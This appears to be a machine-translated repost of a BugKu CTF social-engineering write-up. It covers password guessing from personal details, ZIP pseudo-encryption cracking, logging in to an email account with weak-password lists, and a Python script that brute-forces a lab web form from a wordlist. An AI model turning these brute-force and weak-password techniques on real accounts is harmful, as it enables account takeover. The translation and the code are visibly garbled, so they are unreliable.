BugKu Social Engineering

This is the 9th day of my participation in the August Wen Challenge.More challenges in August

1, password,

Name: Zhang SAN birthday; 19970315 KEY format KEY{XXXXXXXXXX}

Zs, birthday, will do

Answer: the flag {zs199970315}

2. Information search

It is said that bugku.cn can be found on toutiao today. Tip: Flag is in the group number format KEY{XXXXXXXXXXX}

Analysis: Baidu search directly Answer: the KEY {462713425}

3. Simple personal information collection

1. Zip

Resolution:

First try blasting, and then consider ZIP pseudo-encryption, pseudo-encryption cracking tool:

Pseudo encryption solution, open after

The social worker’s website is down

Answer: the flag {15206164164}

4. Social worker advancement

Dry:

Analysis: Baidu post bar search solitary long away

Email should be weak password login, look up the weak password table, one by one try email 163 login,a123456

Answer: the KEY {sg1H78Si9C0s99Q}

5. Wang Xiaoming’s diary

Refer to the link

Resolution:

Note the following information:Bugku online tool

The tools used are:Online password attacks

Using online password attacks, generate dictionaries:

Get a dictionary

Then use the Python script to blow it up

import requests,re
 
def req(pwd) :
url='http://120.24.86.145:8002/xiaoming/? yes'
s = requests.session()
r = s.get(url)
r.encoding = 'utf-8'
# print(r.text)
response = s.post(url,data={'pwd':pwd})
response.encoding = 'utf-8'
# print(response.text)
b = re.findall(R 'Password incorrect, please re-enter', response.text)
# print(b)
return b
 
def zidian() :
f = open('mima.txt'.'r',encoding='UTF-8')
a = f.read()
a = a.splitlines()
return a
 
 
a = zidian()
for pwd in a:
b = req(pwd)
try:
if b[0] = ='Incorrect password, please re-enter':
# print(b[0])
pass
except:
print(pwd)
break
 

Copy the code

Refer to the link

Python3.5 crack. Py WXMCopy the code

Password WXM

Answer: Flag {bugku-shegong_xMQ} reference link 1

6. Simple social worker attempts

Analytic: findneo. Making. IO / 180406 bugku… References: Reference link 1 Reference link 2 Reference link 3 github.com/bugku weibo.com/bugku c.bugku.com/13211.txt

Answer: the flag {BUku_open_shgcx1}

mo4tech.com (Moment For Technology) is a global community with thousands techies from across the global hang out!Passionate technologists, be it gadget freaks, tech enthusiasts, coders, technopreneurs, or CIOs, you would find them all here.

Take you up and win CTF BugKu social engineering

BugKu Social Engineering

1, password,

2. Information search

3. Simple personal information collection

4. Social worker advancement

5. Wang Xiaoming’s diary

6. Simple social worker attempts

Take you up and win CTF BugKu social engineering

BugKu Social Engineering

1, password,

2. Information search

3. Simple personal information collection

4. Social worker advancement

5. Wang Xiaoming’s diary

6. Simple social worker attempts

Related Posts

Collections.sort() for JDK1.8

Automatic SQL writing Springboot integration with Springdata- JPA – makes programming easier

What about front and back API signature security?